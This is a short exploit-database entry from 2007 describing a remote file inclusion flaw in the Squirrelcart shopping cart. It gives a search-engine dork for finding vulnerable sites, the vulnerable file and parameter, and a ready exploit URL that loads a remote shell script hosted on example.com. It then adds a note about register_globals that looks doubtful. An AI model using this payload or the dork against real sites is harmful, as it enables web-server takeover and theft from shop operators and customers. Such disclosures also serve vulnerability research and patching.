exploit-db-mirror/exploits/php/webapps/4295.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

12 lines
No EOL
470 B
Text

Title : Squirrelcart <= 1.x.x Remote File Inclusion
URL : http://squirrelcart.com/
Google Dork : inurl:"/squirrelcart/" -squirrelcart.com
Author : ShaiMagal
Vulnerable file : popup_window.php ->* config.php*, line 13 - $site_isp_root = "blablabla";
Exploit : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt?
notes : register_globals = off is needed it seems.
# milw0rm.com [2007-08-19]